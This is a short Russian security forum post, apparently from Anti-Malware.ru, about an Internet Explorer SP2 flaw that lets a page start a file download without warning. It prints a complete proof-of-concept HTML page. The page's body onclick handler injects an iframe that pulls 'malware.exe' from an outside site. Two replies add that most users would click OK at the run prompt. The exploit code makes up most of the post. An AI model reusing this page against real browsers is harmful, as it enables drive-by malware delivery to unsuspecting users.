-
Загрузка файлов без предупреждения в IE
IE (SP2) не проверяет тег body с событием onclick, который динамически создает iframe. Таким образом появляется возможность создать страницу, при клике на которой автоматически начнется загрузка файла.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com>
<META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META http-equiv=Content-Language content=en-us>
<META content=True name=HandheldFriendly>
<META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
<embed>
<body onclick='a=document.createElement("\<iframe src=\"http:\/\/theinsider.deep-ice.com\/malware.exe\"\>\<\/iframe\>"); document.body.appendChild(a); setTimeout("document.execCommand\(\"refresh\")",10 00)'>
<cebter>
Click AnyWhere You Want</center>
</BODY></HTML>
Источник: http://www.xakep.ru/post/25215/default.asp
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Re:Загрузка файлов без предупреждения в IE
Но при попытке его запустить SP2 видимо попросит разрешения, так что нужно смотреть что спрашивают.
-
-
Re:Загрузка файлов без предупреждения в IE
Но большинство людей (процентов 80) предпочтут нажать кнопку "OK" (чтобы "глупый IE" отстал от них) и пожалуйста получите "сюрприз".
-